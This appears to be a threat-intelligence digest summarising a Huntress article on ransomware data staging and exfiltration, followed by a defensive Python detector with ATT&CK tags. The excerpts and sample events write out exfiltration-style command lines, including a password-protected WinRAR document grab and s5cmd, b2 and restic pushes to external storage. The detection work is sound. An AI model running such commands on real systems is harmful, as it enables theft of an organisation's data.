TTPwire Vol. 1 · MITRE ATT&CK·Tagged


Huntress

Exposing Data Exfiltration | Huntress

2025-08-19

ATT&CK techniques detected

15 predictions
T1560.001 Archive via Utility
100%
"Available tools, such as WinRAR, have also been observed being used by threat actors. Two observed command lines appear as follows: winrar.exe a -m5 -v3g -tn365d -n*.bmp -n*.doc -n*.docx -n*.xls -n*.xlsx -n*.pdf -n*.txt -hp[redacted] "c:\[redact…"
T1048 Exfiltration Over Alternative Protocol
86%
"…is observed frequently enough that it’s often referred to as “... in preparation for data exfiltration …”, rather than explicitly “data staging”. Data exfiltration: LOLBins, backup utilities, and rclone. Data exfiltration can occur in a number of ways. For example, Huntress …"
T1048 Exfiltration Over Alternative Protocol
65%
"Exposing Data Exfiltration | Huntress. Huntress frequently sees data staging and exfiltration activity, particularly with ransomware threat actors. These threat actors will collect, stage, and exfiltrate data prior to file encryption in order to engage in “double extortion” tact…"
T1567.002 Exfiltration to Cloud Storage
62%
"…: Different types of data staging and exfiltration techniques. Data staging: from archival tools to cloud storage sites. Very often, prior to data being exfiltrated out of an organization, it first has to be collected and staged. Threat actors often stage data through the use of a…"
T1486 Data Encrypted for Impact
60%
"…tool is described on GitHub as “a high-performance command-line tool designed for interacting with S3-compatible object storage and local filesystems.” Reviewing the options available at the GitHub site, it appears to be a great option for copying files or “objects” fro…"
T1570 Lateral Tool Transfer
59%
"…tool is described on GitHub as “a high-performance command-line tool designed for interacting with S3-compatible object storage and local filesystems.” Reviewing the options available at the GitHub site, it appears to be a great option for copying files or “objects” fro…"
T1567.002 Exfiltration to Cloud Storage
51%
"…exfiltrating staged data via fzsftp.exe, FileZilla’s SFTP module. Other observed methods of data exfiltration include the use of rclone for syncing files to the cloud, or backup utilities such as restic and Backblaze. The following example command lines include restic being ob…"
T1048 Exfiltration Over Alternative Protocol
48%
"…-off event — Huntress analysts observed a nearly identical s5cmd.exe command line during an incident that occurred five weeks prior to the incident described above. Data exfiltration: detection challenges. Huntress’ 2025 Cyber Threat Report found that in ransomware attacks, at…"
T1560.001 Archive via Utility
43%
"….*" --keep-days 1826 --allow-empty-source --skip-hash-verification --exclude-all-symlinks --threads 30. Very often, tools for data staging are used in close combination with data exfiltration tools. During a recent incident, Huntress analysts observed the…"
T1074 Data Staged
37%
"…: Different types of data staging and exfiltration techniques. Data staging: from archival tools to cloud storage sites. Very often, prior to data being exfiltrated out of an organization, it first has to be collected and staged. Threat actors often stage data through the use of a…"
T1560.001 Archive via Utility
36%
"…: Different types of data staging and exfiltration techniques. Data staging: from archival tools to cloud storage sites. Very often, prior to data being exfiltrated out of an organization, it first has to be collected and staged. Threat actors often stage data through the use of a…"
T1080 Taint Shared Content
34%
"…tool is described on GitHub as “a high-performance command-line tool designed for interacting with S3-compatible object storage and local filesystems.” Reviewing the options available at the GitHub site, it appears to be a great option for copying files or “objects” fro…"
T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
34%
"Exposing Data Exfiltration | Huntress. Huntress frequently sees data staging and exfiltration activity, particularly with ransomware threat actors. These threat actors will collect, stage, and exfiltrate data prior to file encryption in order to engage in “double extortion” tact…"
T1486 Data Encrypted for Impact
31%
"…-off event — Huntress analysts observed a nearly identical s5cmd.exe command line during an incident that occurred five weeks prior to the incident described above. Data exfiltration: detection challenges. Huntress’ 2025 Cyber Threat Report found that in ransomware attacks, at…"
T1074.002 Remote Data Staging
30%
"…: Different types of data staging and exfiltration techniques. Data staging: from archival tools to cloud storage sites. Very often, prior to data being exfiltrated out of an organization, it first has to be collected and staged. Threat actors often stage data through the use of a…"

Summary

Threat actors often steal data during the course of their attacks. This is particularly true for ransomware threat actors, who exfiltrate data before deploying file encryption in order to engage in “double extortion”. The activity can be difficult to detect, particularly when the archiving and copying it relies on closely resembles legitimate actions taken by system administrators.
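The command lines quoted in the excerpts above (a WinRAR archive built with a password and document-type include filters, s5cmd copying to S3-compatible storage, restic and Backblaze backups, rclone syncs, fzsftp.exe) can be scored from process-creation telemetry. The following is an added example, not Huntress code or tooling from the original article: it tokenises Windows command lines, flags WinRAR `a` invocations that combine password protection, volume splitting, an age filter or a document-only include list, flags cloud-copy tools whose destination is a remote rather than a local path, and pairs a staging hit with a later exfiltration hit on the same host, which is the "close combination" the excerpts describe. The event format, the six sample events, the binary names `b2.exe` and `rar.exe`, the six-hour pairing window and the signal thresholds are all assumptions; the sample command lines are constructed, not captured.

```python
"""Flag data-staging and exfiltration command lines in process-creation events.

Added example, not Huntress code. The heuristics follow the tools named on the
page (WinRAR, rclone, restic, Backblaze, s5cmd, fzsftp.exe); the event format,
the names b2.exe and rar.exe, the thresholds and every sample event are assumed.
"""
import re
import shlex
from datetime import datetime, timedelta

STAGING_TOOLS = {"winrar.exe", "rar.exe"}  # rar.exe is an assumed name
EXFIL_TOOLS = {"rclone.exe", "s5cmd.exe", "restic.exe", "b2.exe", "fzsftp.exe"}
DOC_EXTS = {"bmp", "doc", "docx", "xls", "xlsx", "pdf", "txt"}
VERBS = {"copy", "sync", "move", "copyto", "cp", "backup", "upload-file", "upload_file"}
# A destination that is a named remote ("remote:", rclone), s3://, b2://, or
# s3:https://... (restic). Drive letters are one character, so C:\ does not match.
REMOTE_RE = re.compile(r"^[A-Za-z0-9_-]{2,}:")
CORRELATION_WINDOW = timedelta(hours=6)  # assumed staging-to-exfil pairing window


def split_cmdline(cmdline):
    """Tokenise a Windows command line: keep backslashes, drop surrounding quotes."""
    return [t.strip('"') for t in shlex.split(cmdline, posix=False)]


def image_name(tokens):
    return tokens[0].rsplit("\\", 1)[-1].lower()


def staging_signals(tokens):
    """WinRAR switches that make an 'add to archive' look like bulk collection."""
    if len(tokens) < 2 or tokens[1].lower() != "a":  # 'a' = add files to archive
        return []
    signals, included = [], set()
    for t in tokens[2:]:
        low = t.lower()
        if low.startswith("-hp") or low.startswith("-p"):
            signals.append("password-protected archive (-hp/-p)")
        elif low.startswith("-v") and len(low) > 2:
            signals.append(f"split into volumes ({t})")
        elif low.startswith("-tn"):
            signals.append(f"time filter on file age ({t})")
        elif low.startswith("-n") and "." in low:
            included.add(low.rsplit(".", 1)[-1])  # -n*.docx -> docx
    docs = included & DOC_EXTS
    if len(docs) >= 3:
        signals.append("include filter targets documents: " + ", ".join(sorted(docs)))
    return signals


def find_verb(tokens):
    """Return (subcommand, arguments after it); these tools accept global options first."""
    for i, t in enumerate(tokens[1:], 1):
        if t.lower() in VERBS:
            return t.lower(), tokens[i + 1:]
    return "", []


def option_value(tokens, names):
    """Value of the first option in `names`, given as '-r X' or '--repo=X'."""
    for i, t in enumerate(tokens):
        if t.lower() in names and i + 1 < len(tokens):
            return tokens[i + 1]
        for n in names:
            if t.lower().startswith(n + "="):
                return t.split("=", 1)[1]
    return None


def exfil_signals(image, tokens):
    """Why a command line looks like a push of local data to external storage."""
    if image == "fzsftp.exe":
        return ["FileZilla SFTP module started directly"]
    verb, args = find_verb(tokens)
    remotes = [a for a in args if REMOTE_RE.match(a)]
    if image == "rclone.exe" and verb in {"copy", "sync", "move", "copyto"} and remotes:
        return [f"rclone {verb} to remote {remotes[-1]}"]
    if image == "s5cmd.exe" and verb in {"cp", "sync"} and remotes and remotes[-1].lower().startswith("s3://"):
        return [f"s5cmd {verb} to {remotes[-1]}"]
    if image == "restic.exe" and verb == "backup":
        repo = option_value(tokens, {"-r", "--repo"})
        if repo and REMOTE_RE.match(repo):
            return [f"restic backup to repository {repo}"]
    if image == "b2.exe" and verb in {"sync", "upload-file", "upload_file"} and remotes:
        return [f"b2 {verb} to {remotes[-1]}"]
    return []


def analyze(events):
    """Score each event, then pair a staging hit with a later exfil hit on the same host."""
    findings, last_staging = [], {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        tokens = split_cmdline(ev["cmdline"])
        if not tokens:
            continue
        image, ts = image_name(tokens), datetime.fromisoformat(ev["ts"])
        if image in STAGING_TOOLS:
            signals = staging_signals(tokens)
            if len(signals) < 2:  # a single switch is too common in admin use
                continue
            kind = "staging"
            last_staging[ev["host"]] = ts
        elif image in EXFIL_TOOLS:
            signals = exfil_signals(image, tokens)
            if not signals:
                continue
            staged = last_staging.get(ev["host"])
            kind = "staging+exfil" if staged and ts - staged <= CORRELATION_WINDOW else "exfil"
        else:
            continue
        findings.append({"ts": ev["ts"], "host": ev["host"], "image": image, "kind": kind, "signals": signals})
    return findings


# Constructed process-creation events (not from any real incident).
SAMPLE_EVENTS = [
    {"ts": "2025-08-01T01:12:04", "host": "FS01",
     "cmdline": r'"C:\Program Files\WinRAR\WinRAR.exe" a -m5 -v3g -tn365d -n*.bmp -n*.doc -n*.docx '
                r'-n*.xls -n*.xlsx -n*.pdf -n*.txt -hpS3cret "C:\ProgramData\stage\fs01.rar" "D:\Shares\Finance\*"'},
    {"ts": "2025-08-01T01:58:30", "host": "FS01",
     "cmdline": r'C:\Windows\Temp\s5cmd.exe --endpoint-url https://objstore.example --no-verify-ssl cp "C:\ProgramData\stage\*" s3://ex-bkt/fs01/'},
    {"ts": "2025-08-01T03:00:00", "host": "BKP01",  # local-to-local copy: left alone
     "cmdline": r'C:\Tools\rclone.exe copy D:\Backups\sql E:\Archive\sql --progress'},
    {"ts": "2025-08-01T22:40:00", "host": "FS02",
     "cmdline": r'C:\Tools\b2.exe sync --keep-days 1826 --allow-empty-source --skip-hash-verification '
                r'--exclude-all-symlinks --threads 30 "D:\Shares" b2://ex-bkt/fs02'},
    {"ts": "2025-08-02T09:00:00", "host": "WS03",  # extraction, not collection: left alone
     "cmdline": r'"C:\Program Files\WinRAR\WinRAR.exe" x C:\Users\a.admin\Downloads\drivers.rar C:\Temp\drivers'},
    {"ts": "2025-08-02T22:15:00", "host": "WS07",
     "cmdline": r'C:\Users\j.doe\AppData\Local\Temp\restic.exe -r s3:https://s3.example.net/bkt backup D:\Shares\HR --tag hr'},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f'{f["ts"]} {f["host"]:5} {f["kind"]:13} {f["image"]}: {"; ".join(f["signals"])}')
```

The two benign events show the problem the summary raises: a WinRAR extraction and an rclone copy between local drives are exactly what an administrator runs, so the scoring keys on the combination of switches and on whether the destination leaves the host rather than on the tool name alone. In a real environment the remote-name regex, the six-hour window and the two-signal threshold all need tuning against the organisation's own backup jobs, and the restic check misses repositories passed through the `RESTIC_REPOSITORY` environment variable rather than `-r`.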